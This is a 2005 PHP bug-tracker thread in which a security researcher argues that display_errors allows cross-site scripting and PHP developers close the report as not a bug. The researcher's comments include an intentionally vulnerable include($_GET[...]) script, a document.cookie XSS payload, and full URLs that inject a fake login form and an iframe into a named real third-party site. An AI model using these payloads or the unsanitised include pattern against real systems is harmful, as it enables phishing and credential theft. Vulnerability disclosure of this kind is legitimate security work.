ID: 33173 User updated by: max at jestsuper dot pl Reported By: max at jestsuper dot pl Status: Bogus Bug Type: *General Issues Operating System: * PHP Version: * New Comment:
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 > ID: 33173 > Updated by: [EMAIL PROTECTED] > Reported By: max at jestsuper dot pl > -Status: Open > +Status: Bogus > Bug Type: *General Issues > -Operating System: FreeBSD > +Operating System: * > -PHP Version: 4.3.11 > +PHP Version: * > New Comment: > > Thank you for taking the time to write to us, but this is not > a bug. This is bug [XSS]. > Please double-check the documentation available at > http://www.php.net/manual/ and the instructions on how to report > a bug at http://bugs.php.net/how-to-report.php Ok. But this bug still exists, if (html_errors false) etc. > > You're not supposed to pass the error information to your users. Show > erros is only a convenience thing to aid you while developing. Thus no > user will ever see such error messages. So in the end it is not usable > for phishing and alike. Is is.. ;] That can be very dangers. For example phishing. This is XSS! So ok. Example newweb.wrh.noaa.gov http://newweb.wrh.noaa.gov/pdt/prototype/gfeGraphics/gfeGraphics.php?imgSource=%3CP%3E%3Cfont%20color=red%3E%3CP%3E%3Ch1%3EWARNING!%20SYSTEM%20ERROR%3CBR%3EPlease%20login: %3C/h1%3E%3C/font%3E%3Cfont%20size=-4%3E%3C/center%3E%20%3CFORM%20METHOD=POST%20ACTION=mailto:[EMAIL PROTECTED]: %3CINPUT%20TYPE=text%20NAME=login%20SIZE=9%3E%3CP%3EPASSWORD: %3CINPUT%20TYPE=password%20NAME=passwd%20SIZE=9%3E%3CP%3E%3Cinput%20type=submit%20name=go%20value=Login%3E%3C/form%3E%3Cfont%20color=white%3E http://newweb.wrh.noaa.gov/pdt/prototype/gfeGraphics/gfeGraphics.php?imgSource=<iframe src=http://newweb.wrh.noaa.gov> But php errors (Warning) can be in a BANK site... and can you create form ... phishing! Tell me what is wrong. Thx SecurityResason.Com -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.1 (FreeBSD) iD8DBQFCmjvuznmvyJCR4zQRApfYAKCHEknKWRw8zchV6qIwkM0DZt9JNQCfRvcm IDvuoOSzh75uSA9A1xnFiYc= =S4rb -----END PGP SIGNATURE----- Previous Comments: ------------------------------------------------------------------------ [2005-05-28 19:02:37] [EMAIL PROTECTED] Thank you for taking the time to write to us, but this is not a bug. Please double-check the documentation available at http://www.php.net/manual/ and the instructions on how to report a bug at http://bugs.php.net/how-to-report.php You're not supposed to pass the error information to your users. Show erros is only a convenience thing to aid you while developing. Thus no user will ever see such error messages. So in the end it is not usable for phishing and alike. ------------------------------------------------------------------------ [2005-05-28 16:57:51] max at jestsuper dot pl Description: ------------ -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Author: cXIb8O3(Maksymilian Arciemowicz) Date: 28.5.2005 from securityreason.com TEAM - --- 0. Bug in PHP 4.3.11 display_error. --- This bug can be danger, because someone can do xss and Phishing attack. Problem exist in display_errors.. Example php script: <?php include($_GET['varible']); ?> and now request is ?varible=XXX so can we see any error. - --- Warning: main(XXX): failed to open stream: No such file or directory in /www/dupa.php on line 2 Warning: main(): Failed opening 'XXX' for inclusion (include_path='.:') in /www/dupa.php on line 2 - --- Normal. But now varible have for example <h1>SR</h1> And error messages is: - --- Warning: main( SR ): failed to open stream: No such file or directory in /www/dupa.php on line 2 Warning: main(): Failed opening '<h1>SR</h1>' for inclusion (include_path='.:') in /www/dupa.php on line 2 - --- So XSS... Danger can be tag <script> <iframe>, because you can see cookies etc. For example. ?varible=<script>alert(document.cookie);</script> And have you cookies from this domain! This XSS is critical, because exist in display_error and hacker can do XSS and Phishing attack. For example, if this bug exist in a Bank site... hacker can create <FORM> or mirror site... - --- 1.Contact --- Author: Maksymilian Arciemowicz < cXIb8O3 > Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com GPG-KEY: securityreason.com TEAM -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.1 (FreeBSD) iD8DBQFCmIWvznmvyJCR4zQRAuqtAKCcyXWQnMdPvCn+6+npQiGEbXvAZwCgq172 +J8w9EzGFE49sXxP1MPbSfI= =QksY -----END PGP SIGNATURE----- Actual result: -------------- XSS ------------------------------------------------------------------------ -- Edit this bug report at http://bugs.php.net/?id=33173&edit=1